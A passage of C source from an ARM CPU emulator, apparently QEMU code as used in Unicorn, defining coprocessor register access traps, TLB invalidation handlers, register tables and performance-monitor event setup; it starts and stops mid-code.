return CP_ACCESS_OK; } static CPAccessResult access_el3_aa32ns_aa64any(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (!arm_el_is_aa64(env, 3)) { return access_el3_aa32ns(env, ri, isread); } return CP_ACCESS_OK; } /* Some secure-only AArch32 registers trap to EL3 if used from * Secure EL1 (but are just ordinary UNDEF in other non-EL3 contexts). * Note that an access from Secure EL1 can only happen if EL3 is AArch64. * We assume that the .access field is set to PL1_RW. */ static CPAccessResult access_trap_aa32s_el1(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 3) { return CP_ACCESS_OK; } if (arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL3; } /* This will be EL1 NS and EL2 NS, which just UNDEF */ return CP_ACCESS_TRAP_UNCATEGORIZED; } /* Check for traps to "powerdown debug" registers, which are controlled * by MDCR.TDOSA */ static CPAccessResult access_tdosa(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); bool mdcr_el2_tdosa = (env->cp15.mdcr_el2 & MDCR_TDOSA) || (env->cp15.mdcr_el2 & MDCR_TDE) || (arm_hcr_el2_eff(env) & HCR_TGE); if (el < 2 && mdcr_el2_tdosa && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TDOSA)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps to "debug ROM" registers, which are controlled * by MDCR_EL2.TDRA for EL2 but by the more general MDCR_EL3.TDA for EL3. */ static CPAccessResult access_tdra(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); bool mdcr_el2_tdra = (env->cp15.mdcr_el2 & MDCR_TDRA) || (env->cp15.mdcr_el2 & MDCR_TDE) || (arm_hcr_el2_eff(env) & HCR_TGE); if (el < 2 && mdcr_el2_tdra && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TDA)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps to general debug registers, which are controlled * by MDCR_EL2.TDA for EL2 and MDCR_EL3.TDA for EL3. */ static CPAccessResult access_tda(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); bool mdcr_el2_tda = (env->cp15.mdcr_el2 & MDCR_TDA) || (env->cp15.mdcr_el2 & MDCR_TDE) || (arm_hcr_el2_eff(env) & HCR_TGE); if (el < 2 && mdcr_el2_tda && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TDA)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps to performance monitor registers, which are controlled * by MDCR_EL2.TPM for EL2 and MDCR_EL3.TPM for EL3. */ static CPAccessResult access_tpm(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); if (el < 2 && (env->cp15.mdcr_el2 & MDCR_TPM) && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TPM)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TVM and HCR_EL2.TRVM. */ static CPAccessResult access_tvm_trvm(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1) { uint64_t trap = isread ? HCR_TRVM : HCR_TVM; if (arm_hcr_el2_eff(env) & trap) { return CP_ACCESS_TRAP_EL2; } } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TSW. */ static CPAccessResult access_tsw(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TSW)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TACR. */ static CPAccessResult access_tacr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TACR)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TTLB. */ static CPAccessResult access_ttlb(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TTLB)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static void dacr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); raw_write(env, ri, value); tlb_flush(CPU(cpu)); /* Flush TLB as domain not tracked in TLB */ } static void fcse_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); if (raw_read(env, ri) != value) { /* Unlike real hardware the qemu TLB uses virtual addresses, * not modified virtual addresses, so this causes a TLB flush. */ tlb_flush(CPU(cpu)); raw_write(env, ri, value); } } static void contextidr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); if (raw_read(env, ri) != value && !arm_feature(env, ARM_FEATURE_PMSA) && !extended_addresses_enabled(env)) { /* For VMSA (when not using the LPAE long descriptor page table * format) this register includes the ASID, so do a TLB flush. * For PMSA it is purely a process ID and no action is needed. */ tlb_flush(CPU(cpu)); } raw_write(env, ri, value); } /* IS variants of TLB operations must affect all cores */ static void tlbiall_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_all_cpus_synced(cs); } static void tlbiasid_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_all_cpus_synced(cs); } static void tlbimva_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { struct uc_struct *uc = env->uc; CPUState *cs = env_cpu(env); tlb_flush_page_all_cpus_synced(cs, value & TARGET_PAGE_MASK); } static void tlbimvaa_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { struct uc_struct *uc = env->uc; CPUState *cs = env_cpu(env); tlb_flush_page_all_cpus_synced(cs, value & TARGET_PAGE_MASK); } /* * Non-IS variants of TLB operations are upgraded to * IS versions if we are at NS EL1 and HCR_EL2.FB is set to * force broadcast of these operations. */ static bool tlb_force_broadcast(CPUARMState *env) { return (env->cp15.hcr_el2 & HCR_FB) && arm_current_el(env) == 1 && arm_is_secure_below_el3(env); } static void tlbiall_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate all (TLBIALL) */ CPUState *cs = env_cpu(env); if (tlb_force_broadcast(env)) { tlb_flush_all_cpus_synced(cs); } else { tlb_flush(cs); } } static void tlbimva_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { struct uc_struct *uc = env->uc; /* Invalidate single TLB entry by MVA and ASID (TLBIMVA) */ CPUState *cs = env_cpu(env); value &= TARGET_PAGE_MASK; if (tlb_force_broadcast(env)) { tlb_flush_page_all_cpus_synced(cs, value); } else { tlb_flush_page(cs, value); } } static void tlbiasid_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by ASID (TLBIASID) */ CPUState *cs = env_cpu(env); if (tlb_force_broadcast(env)) { tlb_flush_all_cpus_synced(cs); } else { tlb_flush(cs); } } static void tlbimvaa_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { struct uc_struct *uc = env->uc; /* Invalidate single entry by MVA, all ASIDs (TLBIMVAA) */ CPUState *cs = env_cpu(env); value &= TARGET_PAGE_MASK; if (tlb_force_broadcast(env)) { tlb_flush_page_all_cpus_synced(cs, value); } else { tlb_flush_page(cs, value); } } static void tlbiall_nsnh_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx(cs, ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0 | ARMMMUIdxBit_Stage2); } static void tlbiall_nsnh_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0 | ARMMMUIdxBit_Stage2); } static void tlbiipas2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by IPA. This has to invalidate any structures that * contain only stage 2 translation information, but does not need * to apply to structures that contain combined stage 1 and stage 2 * translation information. * This must NOP if EL2 isn't implemented or SCR_EL3.NS is zero. */ CPUState *cs = env_cpu(env); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 40); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_Stage2); } static void tlbiipas2_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 40); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_Stage2); } static void tlbiall_hyp_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx(cs, ARMMMUIdxBit_E2); } static void tlbiall_hyp_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, ARMMMUIdxBit_E2); } static void tlbimva_hyp_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = value & ~MAKE_64BIT_MASK(0, 12); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_E2); } static void tlbimva_hyp_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = value & ~MAKE_64BIT_MASK(0, 12); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_E2); } static const ARMCPRegInfo cp_reginfo[] = { /* Define the secure and non-secure FCSE identifier CP registers * separately because there is no secure bank in V8 (no _EL3). This allows * the secure register to be properly reset and migrated. There is also no * v8 EL1 version of the register so the non-secure instance stands alone. */ { .name = "FCSEIDR", .cp = 15, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 0, .access = PL1_RW, .secure = ARM_CP_SECSTATE_NS, .fieldoffset = offsetof(CPUARMState, cp15.fcseidr_ns), .resetvalue = 0, .writefn = fcse_write, .raw_writefn = raw_write, }, { .name = "FCSEIDR_S", .cp = 15, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 0, .access = PL1_RW, .secure = ARM_CP_SECSTATE_S, .fieldoffset = offsetof(CPUARMState, cp15.fcseidr_s), .resetvalue = 0, .writefn = fcse_write, .raw_writefn = raw_write, }, /* Define the secure and non-secure context identifier CP registers * separately because there is no secure bank in V8 (no _EL3). This allows * the secure register to be properly reset and migrated. In the * non-secure case, the 32-bit register will have reset and migration * disabled during registration as it is handled by the 64-bit instance. */ { .name = "CONTEXTIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .secure = ARM_CP_SECSTATE_NS, .fieldoffset = offsetof(CPUARMState, cp15.contextidr_el[1]), .resetvalue = 0, .writefn = contextidr_write, .raw_writefn = raw_write, }, { .name = "CONTEXTIDR_S", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .secure = ARM_CP_SECSTATE_S, .fieldoffset = offsetof(CPUARMState, cp15.contextidr_s), .resetvalue = 0, .writefn = contextidr_write, .raw_writefn = raw_write, }, REGINFO_SENTINEL }; static const ARMCPRegInfo not_v8_cp_reginfo[] = { /* NB: Some of these registers exist in v8 but with more precise * definitions that don't use CP_ANY wildcards (mostly in v8_cp_reginfo[]). */ /* MMU Domain access control / MPU write buffer control */ { .name = "DACR", .cp = 15, .opc1 = CP_ANY, .crn = 3, .crm = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .writefn = dacr_write, .raw_writefn = raw_write, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.dacr_s), offsetoflow32(CPUARMState, cp15.dacr_ns) } }, /* ARMv7 allocates a range of implementation defined TLB LOCKDOWN regs. * For v6 and v5, these mappings are overly broad. */ { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 0, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 1, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 4, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 8, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, /* Cache maintenance ops; some of this space may be overridden later. */ { .name = "CACHEMAINT", .cp = 15, .crn = 7, .crm = CP_ANY, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_W, .type = ARM_CP_NOP | ARM_CP_OVERRIDE }, REGINFO_SENTINEL }; static const ARMCPRegInfo not_v6_cp_reginfo[] = { /* Not all pre-v6 cores implemented this WFI, so this is slightly * over-broad. */ { .name = "WFI_v5", .cp = 15, .crn = 7, .crm = 8, .opc1 = 0, .opc2 = 2, .access = PL1_W, .type = ARM_CP_WFI }, REGINFO_SENTINEL }; static const ARMCPRegInfo not_v7_cp_reginfo[] = { /* Standard v6 WFI (also used in some pre-v6 cores); not in v7 (which * is UNPREDICTABLE; we choose to NOP as most implementations do). */ { .name = "WFI_v6", .cp = 15, .crn = 7, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_W, .type = ARM_CP_WFI }, /* L1 cache lockdown. Not architectural in v6 and earlier but in practice * implemented in 926, 946, 1026, 1136, 1176 and 11MPCore. StrongARM and * OMAPCP will override this space. */ { .name = "DLOCKDOWN", .cp = 15, .crn = 9, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c9_data), .resetvalue = 0 }, { .name = "ILOCKDOWN", .cp = 15, .crn = 9, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c9_insn), .resetvalue = 0 }, /* v6 doesn't have the cache ID registers but Linux reads them anyway */ { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 0, .opc1 = 1, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = 0 }, /* We don't implement pre-v7 debug but most CPUs had at least a DBGDIDR; * implementing it as RAZ means the "debug architecture version" bits * will read as a reserved value, which should cause Linux to not try * to use the debug hardware. */ { .name = "DBGDIDR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .type = ARM_CP_CONST, .resetvalue = 0 }, /* MMU TLB control. Note that the wildcarding means we cover not just * the unified TLB ops but also the dside/iside/inner-shareable variants. */ { .name = "TLBIALL", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 0, .access = PL1_W, .writefn = tlbiall_write, .type = ARM_CP_NO_RAW }, { .name = "TLBIMVA", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 1, .access = PL1_W, .writefn = tlbimva_write, .type = ARM_CP_NO_RAW }, { .name = "TLBIASID", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 2, .access = PL1_W, .writefn = tlbiasid_write, .type = ARM_CP_NO_RAW }, { .name = "TLBIMVAA", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 3, .access = PL1_W, .writefn = tlbimvaa_write, .type = ARM_CP_NO_RAW }, { .name = "PRRR", .cp = 15, .crn = 10, .crm = 2, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "NMRR", .cp = 15, .crn = 10, .crm = 2, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static void cpacr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint32_t mask = 0; /* In ARMv8 most bits of CPACR_EL1 are RES0. */ if (!arm_feature(env, ARM_FEATURE_V8)) { /* ARMv7 defines bits for unimplemented coprocessors as RAZ/WI. * ASEDIS [31] and D32DIS [30] are both UNK/SBZP without VFP. * TRCDIS [28] is RAZ/WI since we do not implement a trace macrocell. */ if (cpu_isar_feature(aa32_vfp_simd, env_archcpu(env))) { /* VFP coprocessor: cp10 & cp11 [23:20] */ mask |= (1UL << 31) | (1 << 30) | (0xf << 20); if (!arm_feature(env, ARM_FEATURE_NEON)) { /* ASEDIS [31] bit is RAO/WI */ value |= (1UL << 31); } /* VFPv3 and upwards with NEON implement 32 double precision * registers (D0-D31). */ if (!cpu_isar_feature(aa32_simd_r32, env_archcpu(env))) { /* D32DIS [30] is RAO/WI if D16-31 are not implemented. */ value |= (1 << 30); } } value &= mask; } /* * For A-profile AArch32 EL3 (but not M-profile secure mode), if NSACR.CP10 * is 0 then CPACR.{CP11,CP10} ignore writes and read as 0b00. */ if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value &= ~(0xf << 20); value |= env->cp15.cpacr_el1 & (0xf << 20); } env->cp15.cpacr_el1 = value; } static uint64_t cpacr_read(CPUARMState *env, const ARMCPRegInfo *ri) { /* * For A-profile AArch32 EL3 (but not M-profile secure mode), if NSACR.CP10 * is 0 then CPACR.{CP11,CP10} ignore writes and read as 0b00. */ uint64_t value = env->cp15.cpacr_el1; if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value &= ~(0xf << 20); } return value; } static void cpacr_reset(CPUARMState *env, const ARMCPRegInfo *ri) { /* Call cpacr_write() so that we reset with the correct RAO bits set * for our CPU features. */ cpacr_write(env, ri, 0); } static CPAccessResult cpacr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_feature(env, ARM_FEATURE_V8)) { /* Check if CPACR accesses are to be trapped to EL2 */ if (arm_current_el(env) == 1 && (env->cp15.cptr_el[2] & CPTR_TCPAC) && !arm_is_secure(env)) { return CP_ACCESS_TRAP_EL2; /* Check if CPACR accesses are to be trapped to EL3 */ } else if (arm_current_el(env) < 3 && (env->cp15.cptr_el[3] & CPTR_TCPAC)) { return CP_ACCESS_TRAP_EL3; } } return CP_ACCESS_OK; } static CPAccessResult cptr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Check if CPTR accesses are set to trap to EL3 */ if (arm_current_el(env) == 2 && (env->cp15.cptr_el[3] & CPTR_TCPAC)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static const ARMCPRegInfo v6_cp_reginfo[] = { /* prefetch by MVA in v6, NOP in v7 */ { .name = "MVA_prefetch", .cp = 15, .crn = 7, .crm = 13, .opc1 = 0, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NOP }, /* We need to break the TB after ISB to execute self-modifying code * correctly and also to take any pending interrupts immediately. * So use arm_cp_write_ignore() function instead of ARM_CP_NOP flag. */ { .name = "ISB", .cp = 15, .crn = 7, .crm = 5, .opc1 = 0, .opc2 = 4, .access = PL0_W, .type = ARM_CP_NO_RAW, .writefn = arm_cp_write_ignore }, { .name = "DSB", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 4, .access = PL0_W, .type = ARM_CP_NOP }, { .name = "DMB", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 5, .access = PL0_W, .type = ARM_CP_NOP }, { .name = "IFAR", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ifar_s), offsetof(CPUARMState, cp15.ifar_ns) }, .resetvalue = 0, }, /* Watchpoint Fault Address Register : should actually only be present * for 1136, 1176, 11MPCore. */ { .name = "WFAR", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0, }, { .name = "CPACR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 1, .crm = 0, .opc1 = 0, .opc2 = 2, .accessfn = cpacr_access, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.cpacr_el1), .resetfn = cpacr_reset, .writefn = cpacr_write, .readfn = cpacr_read }, REGINFO_SENTINEL }; /* Definitions for the PMU registers */ #define PMCRN_MASK 0xf800 #define PMCRN_SHIFT 11 #define PMCRLC 0x40 #define PMCRDP 0x20 #define PMCRX 0x10 #define PMCRD 0x8 #define PMCRC 0x4 #define PMCRP 0x2 #define PMCRE 0x1 /* * Mask of PMCR bits writeable by guest (not including WO bits like C, P, * which can be written as 1 to trigger behaviour but which stay RAZ). */ #define PMCR_WRITEABLE_MASK (PMCRLC | PMCRDP | PMCRX | PMCRD | PMCRE) #define PMXEVTYPER_P 0x80000000 #define PMXEVTYPER_U 0x40000000 #define PMXEVTYPER_NSK 0x20000000 #define PMXEVTYPER_NSU 0x10000000 #define PMXEVTYPER_NSH 0x08000000 #define PMXEVTYPER_M 0x04000000 #define PMXEVTYPER_MT 0x02000000 #define PMXEVTYPER_EVTCOUNT 0x0000ffff #define PMXEVTYPER_MASK (PMXEVTYPER_P | PMXEVTYPER_U | PMXEVTYPER_NSK | \ PMXEVTYPER_NSU | PMXEVTYPER_NSH | \ PMXEVTYPER_M | PMXEVTYPER_MT | \ PMXEVTYPER_EVTCOUNT) #define PMCCFILTR 0xf8000000 #define PMCCFILTR_M PMXEVTYPER_M #define PMCCFILTR_EL0 (PMCCFILTR | PMCCFILTR_M) static inline uint32_t pmu_num_counters(CPUARMState *env) { return (env->cp15.c9_pmcr & PMCRN_MASK) >> PMCRN_SHIFT; } /* Bits allowed to be set/cleared for PMCNTEN* and PMINTEN* */ static inline uint64_t pmu_counter_mask(CPUARMState *env) { return (1 << 31) | ((1 << pmu_num_counters(env)) - 1); } typedef struct pm_event { uint16_t number; /* PMEVTYPER.evtCount is 16 bits wide */ /* If the event is supported on this CPU (used to generate PMCEID[01]) */ bool (*supported)(CPUARMState *); /* * Retrieve the current count of the underlying event. The programmed * counters hold a difference from the return value from this function */ uint64_t (*get_count)(CPUARMState *); /* * Return how many nanoseconds it will take (at a minimum) for count events * to occur. A negative value indicates the counter will never overflow, or * that the counter has otherwise arranged for the overflow bit to be set * and the PMU interrupt to be raised on overflow. */ int64_t (*ns_per_count)(uint64_t); } pm_event; static bool event_always_supported(CPUARMState *env) { return true; } static uint64_t swinc_get_count(CPUARMState *env) { /* * SW_INCR events are written directly to the pmevcntr's by writes to * PMSWINC, so there is no underlying count maintained by the PMU itself */ return 0; } static int64_t swinc_ns_per(uint64_t ignored) { return -1; } /* * Return the underlying cycle count for the PMU cycle counters. If we're in * usermode, simply return 0. */ static uint64_t cycles_get_count(CPUARMState *env) { return muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), ARM_CPU_FREQ, NANOSECONDS_PER_SECOND); } static int64_t cycles_ns_per(uint64_t cycles) { return (ARM_CPU_FREQ / NANOSECONDS_PER_SECOND) * cycles; } static bool instructions_supported(CPUARMState *env) { return false; } static uint64_t instructions_get_count(CPUARMState *env) { return 0; } static int64_t instructions_ns_per(uint64_t icount) { return cpu_icount_to_ns((int64_t)icount); } static bool pmu_8_1_events_supported(CPUARMState *env) { /* For events which are supported in any v8.1 PMU */ return cpu_isar_feature(any_pmu_8_1, env_archcpu(env)); } static bool pmu_8_4_events_supported(CPUARMState *env) { /* For events which are supported in any v8.1 PMU */ return cpu_isar_feature(any_pmu_8_4, env_archcpu(env)); } static uint64_t zero_event_get_count(CPUARMState *env) { /* For events which on QEMU never fire, so their count is always zero */ return 0; } static int64_t zero_event_ns_per(uint64_t cycles) { /* An event which never fires can never overflow */ return -1; } static const pm_event pm_events[] = { { .number = 0x000, /* SW_INCR */ .supported = event_always_supported, .get_count = swinc_get_count, .ns_per_count = swinc_ns_per, }, { .number = 0x008, /* INST_RETIRED, Instruction architecturally executed */ .supported = instructions_supported, .get_count = instructions_get_count, .ns_per_count = instructions_ns_per, }, { .number = 0x011, /* CPU_CYCLES, Cycle */ .supported = event_always_supported, .get_count = cycles_get_count, .ns_per_count = cycles_ns_per, }, { .number = 0x023, /* STALL_FRONTEND */ .supported = pmu_8_1_events_supported, .get_count = zero_event_get_count, .ns_per_count = zero_event_ns_per, }, { .number = 0x024, /* STALL_BACKEND */ .supported = pmu_8_1_events_supported, .get_count = zero_event_get_count, .ns_per_count = zero_event_ns_per, }, { .number = 0x03c, /* STALL */ .supported = pmu_8_4_events_supported, .get_count = zero_event_get_count, .ns_per_count = zero_event_ns_per, }, }; /* * Note: Before increasing MAX_EVENT_ID beyond 0x3f into the 0x40xx range of * events (i.e. the statistical profiling extension), this implementation * should first be updated to something sparse instead of the current * supported_event_map[] array. */ #define MAX_EVENT_ID 0x3c #define UNSUPPORTED_EVENT UINT16_MAX static uint16_t supported_event_map[MAX_EVENT_ID + 1]; /* * Called upon CPU initialization to initialize PMCEID[01]_EL0 and build a map * of ARM event numbers to indices in our pm_events array. * * Note: Events in the 0x40XX range are not currently supported. */ void pmu_init(ARMCPU *cpu) { unsigned int i; /* * Empty supported_event_map and cpu->pmceid[01] before adding supported * events to them */ for (i = 0; i < ARRAY_SIZE(supported_event_map); i++) { supported_event_map[i] = UNSUPPORTED_EVENT; } cpu->pmceid0 = 0; cpu->pmceid1 = 0; for (i = 0; i < ARRAY_SIZE(pm_events); i++) { const pm_event *cnt = &pm_events[i]; assert(cnt->number <= MAX_EVENT_ID); /* We do not currently support events in the 0x40xx range */ assert(cnt->number <= 0x3f); if (cnt->supported(&cpu->env)) { supported_event_map[cnt->number] = i; uint64_t event_mask = 1ULL << (cnt->number & 0x1f); if (cnt->number & 0x20) { cpu->pmceid1 |= event_mask; } else { cpu->pmceid0 |= event_mask; } } } } /* * Check at runtime whether a PMU event is supported for the current machine */ static bool event_supported(uint16_t number) { if (number > MAX_EVENT_ID) { return false; } return supported_event_map[number] != UNSUPPORTED_EVENT; } static CPAccessResult pmreg_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Performance monitor registers user accessibility is controlled * by PMUSERENR. MDCR_EL2.TPM and MDCR_EL3.TPM allow configurable * trapping to EL2 or EL3 for other accesses. */ int el = arm_current_el(env); if (el == 0 && !(env->cp15.c9_pmuserenr & 1)) { return CP_ACCESS_TRAP; } if (el < 2 && (env->cp15.mdcr_el2 & MDCR_TPM) && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TPM)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static CPAccessResult pmreg_access_xevcntr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* ER: event counter read trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 3)) != 0 && isread) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } static CPAccessResult pmreg_access_swinc(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* SW: software increment write trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 1)) != 0 && !isread) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } static CPAccessResult pmreg_access_selr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* ER: event counter read trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 3)) != 0) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } static CPAccessResult pmreg_access_ccntr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* CR: cycle counter read trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 2)) != 0 && isread) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } /* Returns true if the counter (pass 31 for PMCCNTR) should count events using * the current EL, security state, and register configuration. */ static bool pmu_counter_enabled(CPUARMState *env, uint8_t counter) { uint64_t filter; bool e, p, u, nsk, nsu, nsh, m; bool enabled, prohibited, filtered; bool secure = arm_is_secure(env); int el = arm_current_el(env); uint8_t hpmn = env->cp15.mdcr_el2 & MDCR_HPMN; if (!arm_feature(env, ARM_FEATURE_PMU)) { return false; } if (!arm_feature(env, ARM_FEATURE_EL2) || (counter 